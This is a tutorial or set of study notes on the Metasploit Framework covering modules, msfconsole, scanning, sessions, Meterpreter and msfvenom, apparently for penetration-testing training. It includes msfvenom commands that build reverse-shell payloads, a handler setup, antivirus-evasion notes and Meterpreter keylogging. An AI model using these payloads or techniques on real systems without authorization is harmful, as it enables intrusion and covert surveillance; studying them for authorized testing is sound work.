Metasploit

Metasploit is by far the most popular exploitation framework in the industry.
Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

• It was created by a security researcher named H. D. Moore and then sold to Rapid7.
• There are two versions of Metasploit:
  • Metasploit Framwork: The open-source community (free) version that works from the command line.
  • Metasploit Pro:  The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
• Metasploit, which is written in Ruby, has a robust architecture.
• Metasploit is installed in /usr/share/metasploit-framework by default in Kali Linux. All corresponding files, modules, documentation, and scripts are located in that folder.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows;

• msfconsole: The main command-line interface.
• Modules: supporting modules such as exploits, scanners, payloads, etc.
• Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset.

Modules#

Modules are small components within the Metasploit framework that are built to perform a specific task, such as exploiting a vulnerability, scanning a target, or performing a brute-force attack.
Metasploit has several modules:

• Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers.
• Encoders: Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
• Evasion:  Used to try directly evading an antivirus software.
• Exploits:  The system wise exploits to be used.
• Nops: NOPs (No OPeration) do nothing, literally. They are represented in the Intel x86 CPU family with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.
• Payloads: Payloads are codes that will run on the target system.
• Post: For post-exploitation

You will see four different directories under payloads: adapters, singles, stagers and stages.

• Adapters: An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a Powershell adapter, which will make a single powershell command that will execute the payload.
• Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
• Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
• Stages: Downloaded by the stager. This will allow you to use larger sized payloads.

Payload Types:

• Non-Staged
  • Sends exploit shellcode all at once
  • Larger in size and wont always work
  • eg: windows/meterpreter_reverse_tcp
• Staged
  • Sends payload in stages
  • can be less stable
  • eg: windows/meterpreter/reverse_tcp

Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.
inline (or single) payload, is indicated by the _ between “shell” and “reverse”.
a staged payload, is indicated by the / between “shell” and “reverse”.

Msfconsole#

msfconsole will be your main interface to the Metasploit Framework.

• You can launch it using the msfconsole command.
• The Metasploit console (msfconsole) can be used just like a regular command-line shell (ie, we can use ls, ping, help, clear, history etc).
• It also supports tab completion.
• Msfconsole is managed by context; this means that unless set as a global variable, all parameter settings will be lost if you change the module you have decided to use.
• use
  • We can select the module we want to use by this command.
  • The module to be used can also be selected with the use command followed by the number at the beginning of the search result line.
  • eg: use exploit/windows/smb/ms17_010_eternalblue
    • You will see the command line prompt change from msf6 to msf6 exploit(windows/smb/ms17_010_eternalblue). The prompt tells us we now have a context set in which we will work.
    • You can leave the context using the back command.
• show
  • show options will print options related to the exploit we have chosen earlier. The show options command will have different outputs depending on the context it is used in.
  • The show command can be used in any context followed by a module type (auxiliary, payload, exploit, etc.) to list available modules.
  • If used from the msfconsole prompt, the show command will list all modules.
• info
  • This will display detailed information on the module such as its author, relevant sources, etc.
  • You can use the info command followed by the module’s path from the msfconsole prompt (e.g. info exploit/windows/smb/ms17_010_eternalblue).
  • Or also by typing the info command within a module’s context.
• search
  • This command will search the Metasploit Framework database for modules relevant to the given search parameter.
  • You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.
  • The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name. You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.). You can use any module returned in a search result with the command use followed by the number at the beginning of the result line.
  • Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. Refer ranking documentation ↗.
  • You can direct the search function using keywords such as type and platform. (eg: search type:auxiliary telnet)
• set
  • After entering the context of a module, you need to set parameters. Based on the module you use, additional or different parameters may need to be set. It is good practice to use the show options command to list the required parameters.
  • All parameters are set using the command syntax: set PARAMETER_NAME VALUE.
  • Parameters you will often use are:
    • RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x – 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
    • RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
    • PAYLOAD: The payload you will use with the exploit.
    • LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
    • LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.
    • SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.
  • You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the unset PARAMETER_NAME command or clear all set parameters with the unset all command.
  • You can use the setg command to set values that will be used for all modules (sets a global value). You can clear any value set with setg using unsetg.
• exploit
  • Once all module parameters are set, you can launch the module using the exploit command.
  • Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).
  • The exploit command can be used without any parameters or using the “-z” parameter.
  • The exploit -z command will run the exploit and background the session as soon as it opens. This will return you the context prompt from which you have run the exploit.
  • Some modules support the check option. This will check if the target system is vulnerable without exploiting it.

Scanning#

Metasploit has a number of modules to scan open ports on the target system and network. (eg: auxiliary/scanner/portscan/tcp)

• You can list potential port scanning modules available using the search portscan command.
• You can also directly perform Nmap scans from the msfconsole prompt.
• The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP. this module will not conduct an extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.
• Metasploit offers several useful auxiliary modules that allow us to scan specific services. eg: For SMB , smb_enumshares and smb_version

Exploitation#

You can search exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit.
Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other commands you can use with that specific exploit. Some payloads will open new parameters that you may need to set (eg: LHOST for reverse shells)

• Select the payload to use using set payload PAYLOAD_NAME/index

Sessions#

Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.

• The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.
• To interact with any session, you can use the sessions -i command followed by the desired session number.
• You can use the background command to background the session prompt and go back to the msfconsole prompt. Alternatively, CTRL+Z can be used to background sessions.
• When running post-exploitation modules, you can set session to use as set SESSION SESSION_ID

Meterpreter#

The Meterpreter module of the Metasploit framework can be used to create bind and reverse shells and to perform numerous other post-exploitation tasks.

• Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter’s specialized commands.
• Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus scans. Meterpreter will be seen as a process and not have a file on the target system. It also spoofs its process name.
• Meterpreter also aims to avoid being detected by network-based IPS  and IDS solutions by using encrypted communication with the server where Metasploit runs.
• Meterpreter payload for a bind TCP connection (after exploitation) being set: set payload windows/x64/meterpreter/bind_tcp

Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.
Meterpreter will provide you with three primary categories of tools:

• Built-in commands
• Meterpreter tools
• Meterpreter scripting

Common Meterpreter commands#

Typing help on any Meterpreter session will list all available commands. Every version of Meterpreter will have different command options.

Migrating to another process#

Migrating to another process will help Meterpreter interact with it.

• For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process.
• Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger.
• Migrating to another process may also help you to have a more stable Meterpreter session.
• Just because we are system doesn’t mean our process is, so we have to migrate our meterpreter process to a process running at NT AUTHORITY\SYSTEM .
• To migrate to any process, you need to type the migrate command followed by the PID of the desired target process: migrate PID
• This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again.

Convert a normal shell to meterpreter shell#

• Quick upgrade using sessions -u:
  • If you are already interacting with the shell session, press Ctrl + Z to return to the msf> prompt. Type Y if prompted to background the session.
  • While in the msfconsole, check your active shells by running: sessions -l
  • Upgrade the session with the command: sessions -u <ID>
  • Metasploit will create a new session ID. Once the payload connects, view the sessions again and connect using: sessions -i <NEW_ID>
• Using the module post/multi/manage/shell_to_meterpreter
  • Background the current shell to exit to msfconsole and run use post/multi/manage/shell_to_meterpreter
  • Set SESSION, LHOST and run.
  • The module will automatically spin up a listener and upgrade your standard shell to a fully featured Meterpreter shell.

Metasploit Database#

Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.
You can use a PostgreSQL database to accelerate the tasks in Metasploit and index the underlying components.

1. You need to start the PostgreSQL service before using the database by using the following command: service postgresql start or systemctl start postgresql
2. After starting the PostgreSQL service, you need to create and initialize the Metasploit database with the msfdb init command.
   Set password. ( Run it as the postgres account using sudo -u postgres msfdb init.)
3. Check the database status using the db_status command in msfconsole.

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace.

• You can list available workspaces using the workspace command.
• You can add a workspace using the -a parameter or delete a workspace using the -d parameter.
• You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name.

There are some Database Backends Commands available when metaploit is launched with a database.

• If you run a Nmap scan using the db_nmap, all results will be saved to the database.
• You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
• Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.
• The services command used with the -S parameter will allow you to search for specific services in the environment.

MSFvenom#

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

• Msfvenom will allow you to access all payloads available in the  Metasploit framework.
• Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).

msfvenom -l payloads

You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python). The msfvenom --list formats command can be used to list supported output formats

Encoding#

Payloads can be encoded to multiple formats using the -e paramter.
eg: Generating a PHP payload, here the PHP version of Meterpreter is encoded in Base64, and the output format set to raw.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Handlers#

Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically handled by the exploit module. 
Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.

We can use Multi Handler to receive the incoming connections.

• The module can be used with the use exploit/multi/handler command.
• Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
• To use the module, we will need to set the payload value (eg: php/reverse_php), the LHOST, and LPORT values.
• Once everything is set, we will run the handler and wait for the incoming connection.
• When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.
• If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.

Based on the target system’s configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:

• Linux Executable and Linkable Format (elf)
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
  The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the lab machine. For example, once you have the shell.elf file on your lab machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the lab machine command line.
• Windows
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
• PHP
  msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
  The output PHP file will miss the starting PHP tag commented and the end tag (?>), it should be edited to convert it into a working PHP file.
• ASP
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
• Python
  msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

Resources#

•  Metasploit Unleashed is a free detailed Metasploit course released by Offensive Security. The course can be accessed at https://www.offensive-security.com/metasploit-unleashed ↗.